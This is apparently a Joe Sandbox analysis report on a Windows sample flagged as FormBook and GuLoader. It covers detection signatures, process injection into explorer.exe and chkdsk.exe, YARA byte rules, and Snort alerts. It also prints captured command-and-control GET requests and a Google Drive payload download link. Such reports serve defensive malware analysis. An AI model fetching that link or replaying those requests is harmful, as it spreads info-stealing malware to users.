Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report UAE CONTRACT SUPPLY.exe

Overview

General Information

Sample Name:UAE CONTRACT SUPPLY.exe
Analysis ID:358403
MD5:9da74a6d583c801677c0e2fde51586ba
SHA1:e1af77b99ca69e4737fa4d73a77e5702d5c13e91
SHA256:9d295dd246f6844b1bfe945cdf914a1615d0dacd9aa9f40d1276bc75f796268c
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • UAE CONTRACT SUPPLY.exe (PID: 6848 cmdline: 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe' MD5: 9DA74A6D583C801677C0E2FDE51586BA)
    • UAE CONTRACT SUPPLY.exe (PID: 6952 cmdline: 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe' MD5: 9DA74A6D583C801677C0E2FDE51586BA)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 4804 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • chkdsk.exe (PID: 392 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 5048 cmdline: /c del 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.633691017.0000000005BC7000.00000004.00000001.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
  • 0x5434:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 19 entries

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: UAE CONTRACT SUPPLY.exeVirustotal: Detection: 33%Perma Link
      Source: UAE CONTRACT SUPPLY.exeReversingLabs: Detection: 36%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY
      Source: 16.2.chkdsk.exe.5bc7960.5.unpackAvira: Label: TR/Dropper.Gen
      Source: 16.2.chkdsk.exe.fd4f08.1.unpackAvira: Label: TR/Dropper.Gen

      Compliance:

      barindex
      Uses 32bit PE filesShow sources
      Source: UAE CONTRACT SUPPLY.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Uses secure TLS version for HTTPS connectionsShow sources
      Source: unknownHTTPS traffic detected: 142.250.184.65:443 -> 192.168.2.6:49731 version: TLS 1.2
      Binary contains paths to debug symbolsShow sources
      Source: Binary string: chkdsk.pdbGCTL source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.514667556.00000000000B0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000D.00000000.498357108.00000000075A0000.00000002.00000001.sdmp
      Source: Binary string: chkdsk.pdb source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.514667556.00000000000B0000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.519848532.000000001E5BF000.00000040.00000001.sdmp, chkdsk.exe, 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: UAE CONTRACT SUPPLY.exe, chkdsk.exe
      Source: Binary string: wscui.pdb source: explorer.exe, 0000000D.00000000.498357108.00000000075A0000.00000002.00000001.sdmp
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop esi16_2_00CF581F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop ebx16_2_00CE6A9D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi16_2_00CF62AB
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi16_2_00CEC3CC
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi16_2_00CEC358

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 104.21.32.11:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 104.21.32.11:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 104.21.32.11:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 34.102.136.180:80
      Source: global trafficHTTP traffic detected: GET /w25t/?7nf0kP=UE8df8CjPA42HhSGpHRvEFW0E1qwQi3qh9I+J2DwYVAPWlwUU9Jt0Xern2mXQMt791bHr0Uusg==&wj=hBZ8sVLxwZopBdRp HTTP/1.1Host: www.aserchofalltrades.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /w25t/?7nf0kP=Uq0CzCwvS6YoWMp/UCKN7JIAByS11Z6E5aUOsXAJZj+0yJL9Nk5m9Qz8CvCcNaQrIL6Vs/Uw3Q==&wj=hBZ8sVLxwZopBdRp HTTP/1.1Host: www.parentseducationalco-op.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /w25t/?7nf0kP=x6qnXySIKpUJn5XerhvX+0EMzo20pmQQj9ePwr3K6ImaWCKGjDlnwZkCLhxG6Ruvc228xc+5mw==&wj=hBZ8sVLxwZopBdRp HTTP/1.1Host: www.allsalesvinyl.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=15PPGsvA0OesMgSYtNkzWMXd9CXxAPrih7Pi9b51HvfmowsB4G7YJFhsDDlnN8h0byCLDSw3/g== HTTP/1.1Host: www.pardsoda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=SQSlpqwSeyxeA2HWARjbLzFChTkDZ06wC9CS935ywhThxAQMIzjb51bRjEk1pH3EnhYaWQ8xDg== HTTP/1.1Host: www.sixteen3handscottages.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
      Source: Joe Sandbox ViewASN Name: WIX_COMIL WIX_COMIL
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /w25t/?7nf0kP=UE8df8CjPA42HhSGpHRvEFW0E1qwQi3qh9I+J2DwYVAPWlwUU9Jt0Xern2mXQMt791bHr0Uusg==&wj=hBZ8sVLxwZopBdRp HTTP/1.1Host: www.aserchofalltrades.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /w25t/?7nf0kP=Uq0CzCwvS6YoWMp/UCKN7JIAByS11Z6E5aUOsXAJZj+0yJL9Nk5m9Qz8CvCcNaQrIL6Vs/Uw3Q==&wj=hBZ8sVLxwZopBdRp HTTP/1.1Host: www.parentseducationalco-op.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /w25t/?7nf0kP=x6qnXySIKpUJn5XerhvX+0EMzo20pmQQj9ePwr3K6ImaWCKGjDlnwZkCLhxG6Ruvc228xc+5mw==&wj=hBZ8sVLxwZopBdRp HTTP/1.1Host: www.allsalesvinyl.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=15PPGsvA0OesMgSYtNkzWMXd9CXxAPrih7Pi9b51HvfmowsB4G7YJFhsDDlnN8h0byCLDSw3/g== HTTP/1.1Host: www.pardsoda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=SQSlpqwSeyxeA2HWARjbLzFChTkDZ06wC9CS935ywhThxAQMIzjb51bRjEk1pH3EnhYaWQ8xDg== HTTP/1.1Host: www.sixteen3handscottages.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: doc-08-78-docs.googleusercontent.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Feb 2021 14:28:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-wix-request-id: 1614263295.2061857739024538739vary: Accept-EncodingAge: 0X-Seen-By: jeslxIFvDH4ulYwNNi+3Muwfbs+7qUVAqsIx00yI78k=,sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVgAmI6NXu6WfqLI/M7f8tcV,2d58ifebGbosy5xc+FRaljJhPW/QGfx+q8yY6tJt4liplW2KIFCnP2WuDwYfqFs95giHFpZ7ywPurTQjYl2cGQ==,2UNV7KOq4oGjA5+PKsX47Ay/vVeTGg75VNBOw8znOgAfbJaKSXYQ/lskq2jK6SGP,m0j2EEknGIVUW/liY8BLLsk16xozuw6nSXf6CEzK6Aca0sM5c8dDUFHeNaFq0qDu,JLaio/7uvfP647F5CQsGZbrBoTckX0poWZhq63wruFRGp/J3MBzgzU8QHrQuh4zQ,9phxMuSXVGy04obH0oEnZZDXl7I7ILTyJojtezEQxYM0d1JjSaSBjnO+SH73qBkvWIHlCalF7YnfvOr2cMPpyw==Server: Pepyaka/1.15.10Data Raw: 62 39 33 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 77 69 78 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 Data Ascii: b93 <!-- --><!doctype html><!-- --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollo
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 0000000D.00000002.631792237.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: UAE CONTRACT SUPPLY.exeString found in binary or memory: https://drive.google.com/uc?export=download&id=1tH9Kn1AiB6JALzFxr9xEwyDe2gfOw8eq
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownHTTPS traffic detected: 142.250.184.65:443 -> 192.168.2.6:49731 version: TLS 1.2

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000010.00000002.633691017.0000000005BC7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000010.00000002.631687849.0000000000FD4000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02266266 NtResumeThread,1_2_02266266
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226054E EnumWindows,NtSetInformationThread,1_2_0226054E
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02262592 NtWriteVirtualMemory,1_2_02262592
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02265DCB NtProtectVirtualMemory,1_2_02265DCB
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02266629 NtResumeThread,1_2_02266629
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02260636 NtSetInformationThread,1_2_02260636
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226263A NtWriteVirtualMemory,1_2_0226263A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02263606 NtSetInformationThread,LoadLibraryA,1_2_02263606
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226626E NtResumeThread,1_2_0226626E
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226066A NtSetInformationThread,1_2_0226066A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02262644 NtWriteVirtualMemory,1_2_02262644
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226065C NtSetInformationThread,1_2_0226065C
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022606A9 NtSetInformationThread,1_2_022606A9
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02260682 NtSetInformationThread,1_2_02260682
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02260690 NtSetInformationThread,1_2_02260690
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226629C NtResumeThread,1_2_0226629C
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02262698 NtWriteVirtualMemory,1_2_02262698
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022606EA NtSetInformationThread,1_2_022606EA
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022662EA NtResumeThread,1_2_022662EA
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022626FD NtWriteVirtualMemory,1_2_022626FD
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022662C5 NtResumeThread,1_2_022662C5
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022652C8 NtSetInformationThread,1_2_022652C8
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02266335 NtResumeThread,1_2_02266335
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02262764 NtWriteVirtualMemory,1_2_02262764
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022663A0 NtResumeThread,1_2_022663A0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022663AA NtResumeThread,1_2_022663AA
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022663F8 NtResumeThread,1_2_022663F8
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022627DA NtWriteVirtualMemory,1_2_022627DA
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226283B NtWriteVirtualMemory,1_2_0226283B
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226641E NtResumeThread,1_2_0226641E
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02265040 NtSetInformationThread,1_2_02265040
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02266455 NtResumeThread,1_2_02266455
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022664A4 NtResumeThread,1_2_022664A4
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022628BC NtWriteVirtualMemory,1_2_022628BC
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022664FB NtResumeThread,1_2_022664FB
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02266566 NtResumeThread,1_2_02266566
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02262942 NtWriteVirtualMemory,1_2_02262942
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022629BD NtWriteVirtualMemory,1_2_022629BD
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022625E5 NtWriteVirtualMemory,1_2_022625E5
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022605D4 NtSetInformationThread,1_2_022605D4
